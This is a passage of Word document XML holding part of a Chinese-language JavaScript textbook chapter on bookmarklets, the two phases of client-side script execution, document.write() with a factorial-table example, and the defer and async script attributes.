      </w:r>
      <w:r>
        <w:t>/a</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>注意，即便这个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">JavaScript </w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>是写成多行的，</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>解析器仍将它作为单独的一行对待，并且其中的单行</w:t>
      </w:r>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>注释也是无效的。还有，要记住代码是单引号中的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>属性的一部分，所以代码不可以包含任何单引号。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在开发时，把这样的链接硬编码在页面中是有用的；而把它另存为可以在任何页面上运行的书签，就更有用了。通常，在浏览器里把超链接的地址加入书签可以这样做，在链接上右击并选择类似</w:t>
      </w:r>
      <w:r>
        <w:t>"Bookmark Link"</w:t>
      </w:r>
      <w:r>
        <w:t>的选项，或者拖动链接到书签工具栏。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="312" w:name="13_3_JavaScriptCheng_Xu_De_Zhi_Xing_"/>
      <w:r>
        <w:t>13.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>程序的执行</w:t>
      </w:r>
      <w:bookmarkEnd w:id="312"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>程序没有严格的定义。我们可以说</w:t>
      </w:r>
      <w:r>
        <w:t>J</w:t>
      </w:r>
      <w:r>
        <w:t>avaScript</w:t>
      </w:r>
      <w:r>
        <w:t>程序是由</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>页面中所包含的所有</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码（内联脚本、</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序和</w:t>
      </w:r>
      <w:r>
        <w:t>javascript:URL</w:t>
      </w:r>
      <w:r>
        <w:t>）和通过＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞标签的</w:t>
      </w:r>
      <w:r>
        <w:t>src</w:t>
      </w:r>
      <w:r>
        <w:t>属性引用的外部</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码组成。所有这些单独的代码共用同一个全局</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象。这意味着它们都可以看到相同的</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>对象，可以共享相同的全局函数和变量的集合：如果一个脚本定义了</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>新的全局变量或函数，那么这个变量或函数会在脚本执行之后对任意</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码可见。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>页面包含一个嵌入的窗体（通常使用＜</w:t>
      </w:r>
      <w:r>
        <w:t>ifr</w:t>
      </w:r>
      <w:r>
        <w:t>ame</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素），嵌入文档中的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码和被嵌入文档里的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码会有不同的全局对象，它可以当做一个单独的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>程序。但是，要记住，没有严格的关于</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>程序范围的定义。如果外面和里面的文档来自于同一个服务器，那么两个文档中的代码就可以进行交互，并且如果你愿意，就可以把它们当做是同一个程序的两个相互作用的部分。</w:t>
      </w:r>
      <w:r>
        <w:t>14.8.3</w:t>
      </w:r>
      <w:r>
        <w:t>节会详细介绍全局</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象以及不同窗口和窗体之间的交互。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>bookmarklet</w:t>
      </w:r>
      <w:r>
        <w:t>里的</w:t>
      </w:r>
      <w:r>
        <w:t>javascript:URL</w:t>
      </w:r>
      <w:r>
        <w:t>存在于文档之外，可</w:t>
      </w:r>
      <w:r>
        <w:t>以想象成是一种用户扩展或者对于其他程序的修改。当用户执行一个</w:t>
      </w:r>
      <w:r>
        <w:t>bookmarklet</w:t>
      </w:r>
      <w:r>
        <w:t>时，书签里的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码就可以访问全局对象和当前文档的内容，以及对它进行操作。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>程序的执行有两个阶段。在第一阶段，载入文档内容，并执行＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素里的代码（包括内联脚本和外部脚本）。脚本通常（但不总是，参见</w:t>
      </w:r>
      <w:r>
        <w:t>13.3.1</w:t>
      </w:r>
      <w:r>
        <w:t>节）会按它们在文档里的出现顺序执行。所有脚本里的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码都是从上往下，按照它在条件、循环以及其他控制语句中的出现顺序执行。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>当文档载入完成，并且所有脚本执行</w:t>
      </w:r>
      <w:r>
        <w:t>完成后，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>执行就进入它的第二阶段。这个阶段是异步的，而且由事件驱动的。在事件驱动阶段，</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器调用事件处理程序函数（由第一阶段里执行的脚本指定的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序，或之前调用的事件处理程序来定义），来响应异步发生的事件。调用事件处理程序通常是响应用户输入（如鼠标单击，键盘按下等）。但是，还可以由网络活动、运行时间或者</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码中的错误来触发。第</w:t>
      </w:r>
      <w:r>
        <w:t>17</w:t>
      </w:r>
      <w:r>
        <w:t>章会详细介绍事件和事件处理程序。</w:t>
      </w:r>
      <w:r>
        <w:t>13.3.2</w:t>
      </w:r>
      <w:r>
        <w:t>节也会进行更多讨论。注意，嵌入在</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>页面里的</w:t>
      </w:r>
      <w:r>
        <w:t>javascript:URL</w:t>
      </w:r>
      <w:r>
        <w:t>也可以</w:t>
      </w:r>
      <w:r>
        <w:t>被当做是一种事件处理程序，因为直到用户通过单击链接或提交表单来激活之后它们才会有效果。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>事件驱动阶段里发生的第一个事件是</w:t>
      </w:r>
      <w:r>
        <w:t>load</w:t>
      </w:r>
      <w:r>
        <w:t>事件，指示文档已经完全载入，并可以操作。</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>程序经常用这个事件来触发或发送消息。我们会经常看到一些定义函数的脚本程序，除了定义一个</w:t>
      </w:r>
      <w:r>
        <w:t>onload</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序函数外不做其他操作，这个函数会在脚本事件驱动阶段开始时被</w:t>
      </w:r>
      <w:r>
        <w:t>load</w:t>
      </w:r>
      <w:r>
        <w:t>事件触发。正是这个</w:t>
      </w:r>
      <w:r>
        <w:t>onload</w:t>
      </w:r>
      <w:r>
        <w:t>事件会对文档进行操作，并做程序想做的任何事。</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>程序的载入阶段是相对短暂的，通常只持续</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>秒。在文档载</w:t>
      </w:r>
      <w:r>
        <w:t>入完成之后，只要</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器显示文档，事件驱动阶段就会一直持续下去。因为这个阶段是异步的和事件驱动的，所以可能有长时间处于不活动状态，没有</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>被执行，被用户或网络事件触发的活动打断。</w:t>
      </w:r>
      <w:r>
        <w:t>13.3.4</w:t>
      </w:r>
      <w:r>
        <w:t>节会详细介绍</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>执行的两个阶段。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>核心</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>和客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>都有一个单线程执行模型。脚本和事件处理程序（无论如何）在同一个时间只能执行一个，没有并发性。这保持了</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>编程的简单性，在</w:t>
      </w:r>
      <w:r>
        <w:t>13.3.3</w:t>
      </w:r>
      <w:r>
        <w:t>节会介绍。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="313" w:name="13_3_1_Tong_Bu___Yi_Bu_He_Yan_Chi_De_Jia"/>
      <w:r>
        <w:t>13.3.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　同步、异步和延迟的脚本</w:t>
      </w:r>
      <w:bookmarkEnd w:id="313"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>J</w:t>
      </w:r>
      <w:r>
        <w:t>avaScript</w:t>
      </w:r>
      <w:r>
        <w:t>第一次添加到</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器时，还没有</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>可以用来遍历和操作文档的结构和内容。当文档还在载入时，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>影响文档内容的唯一方法是快速生成内容。它使用</w:t>
      </w:r>
      <w:r>
        <w:t>document.write()</w:t>
      </w:r>
      <w:r>
        <w:t>方法完成上述任务。例</w:t>
      </w:r>
      <w:r>
        <w:t>13-3</w:t>
      </w:r>
      <w:r>
        <w:t>展示了</w:t>
      </w:r>
      <w:r>
        <w:t>1996</w:t>
      </w:r>
      <w:r>
        <w:t>年最先进的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码的样子。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>13-3</w:t>
      </w:r>
      <w:r>
        <w:t>：载入时生成文档内容</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>h1</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>Table of Factorials</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/h1</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function factorial(n){//</w:t>
      </w:r>
      <w:r>
        <w:t>用来计算阶乘的函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(n</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>=1)return n;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>el</w:t>
      </w:r>
      <w:r>
        <w:t>se return n*factorial(n-1);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>document.write("</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>table</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>");//</w:t>
      </w:r>
      <w:r>
        <w:t>开始创建</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>表</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>document.write("</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>tr</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>th</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/th</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>th</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>n!</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/th</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>/tr</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>");//</w:t>
      </w:r>
      <w:r>
        <w:t>输出表头</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var i=1;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>=10;i++){//</w:t>
      </w:r>
      <w:r>
        <w:t>输出</w:t>
      </w:r>
      <w:r>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:t>行</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>document.write("</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>tr</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>td</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>"+i+"</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/td</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>td</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>"+factorial(i)+"</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/td</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>/tr</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>document.write("</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/table</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>");//</w:t>
      </w:r>
      <w:r>
        <w:t>表格结束</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>document.write("Generated at"+new Date());//</w:t>
      </w:r>
      <w:r>
        <w:t>输出时间戳</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当脚本把文本传递给</w:t>
      </w:r>
      <w:r>
        <w:t>document.write()</w:t>
      </w:r>
      <w:r>
        <w:t>时，这个文本被添加到文档输入流中，</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>解析器会在当前位置创建一个文本节点，将文本插入这个文本节点后面。我们并不推荐使用</w:t>
      </w:r>
      <w:r>
        <w:t>document.write()</w:t>
      </w:r>
      <w:r>
        <w:t>，但在某些场景下它有着重要的用途（见</w:t>
      </w:r>
      <w:r>
        <w:t>15.10.2</w:t>
      </w:r>
      <w:r>
        <w:t>节）。当</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>解析器遇到＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素时，它默认必须先执行脚</w:t>
      </w:r>
      <w:r>
        <w:t>本，然后再恢复文档的解析和渲染。这对于内联脚本没什么问题，但如果脚本源代码是一个由</w:t>
      </w:r>
      <w:r>
        <w:t>src</w:t>
      </w:r>
      <w:r>
        <w:t>属性指定的外部文件，这意味着脚本后面的文档部分在下载和执行脚本之前，都不会出现在浏览器中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[6]</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>脚本的执行只在默认情况下是同步和阻塞的。＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞标签可以有</w:t>
      </w:r>
      <w:r>
        <w:t>defer</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>async</w:t>
      </w:r>
      <w:r>
        <w:t>属性，这（在支持它们的浏览器里）可以改变脚本的执行方式。这些都是布尔属性，没有值；只需要出现在＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞标签里即可。</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>说这些属性只在和</w:t>
      </w:r>
      <w:r>
        <w:t>src</w:t>
      </w:r>
      <w:r>
        <w:t>属性联合使用时才有效，但有些浏览器还支持延迟的内联脚本：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">script </w:t>
      </w:r>
      <w:r>
        <w:t>defer src="deferred.js"</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>/script</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>script async src="async.js"</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>/script</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>defer</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>async</w:t>
      </w:r>
      <w:r>
        <w:t>属性都像在告诉浏览器链接进来的脚本不会使用</w:t>
      </w:r>
      <w:r>
        <w:t>document.write()</w:t>
      </w:r>
      <w:r>
        <w:t>，也不会生成文档内容，因此浏览器可以在下载脚本时继续解析和渲染文档。</w:t>
      </w:r>
      <w:r>
        <w:t>defer</w:t>
      </w:r>
      <w:r>
        <w:t>属性使得浏览器延迟脚本的执行，直到文档的载入和解析完成，并可以操作。</w:t>
      </w:r>
      <w:r>
        <w:t>async</w:t>
      </w:r>
      <w:r>
        <w:t>属性使得浏览器可以尽快地执行脚本，而不用在下载脚本时阻塞文档解析。如果＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞标签同时有两个属性，同时支</w:t>
      </w:r>
      <w:r>
        <w:t>持两者的浏览器会遵从</w:t>
      </w:r>
      <w:r>
        <w:t>async</w:t>
      </w:r>
      <w:r>
        <w:t>属性并忽略</w:t>
      </w:r>
      <w:r>
        <w:t>defer</w:t>
      </w:r>
      <w:r>
        <w:t>属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>注意，延迟的脚本会按它们在文档里的出现顺序执行。而异步脚本在它们载入后执行，这意味着它们可能会无序执行。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在撰写本书的时候，</w:t>
      </w:r>
      <w:r>
        <w:t>async</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>defer</w:t>
      </w:r>
      <w:r>
        <w:t>属性还没有广泛实现，它们只被一些优化建议所考虑。即便延迟和异步的脚本会同步执行，</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>页面应该还可以正常工作。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>甚至可以在不支持</w:t>
      </w:r>
      <w:r>
        <w:t>async</w:t>
      </w:r>
      <w:r>
        <w:t>属性的浏览器里，通过动态创建＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素并把它插入到文档中，来实现脚本的异步载入和执行。例</w:t>
      </w:r>
      <w:r>
        <w:t>13-4</w:t>
      </w:r>
      <w:r>
        <w:t>里的</w:t>
      </w:r>
      <w:r>
        <w:t>loadasync()</w:t>
      </w:r>
      <w:r>
        <w:t>函数完成了这个工作。第</w:t>
      </w:r>
      <w:r>
        <w:t>15</w:t>
      </w:r>
      <w:r>
        <w:t>章会介绍它使</w:t>
      </w:r>
      <w:r>
        <w:t>用的技术。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
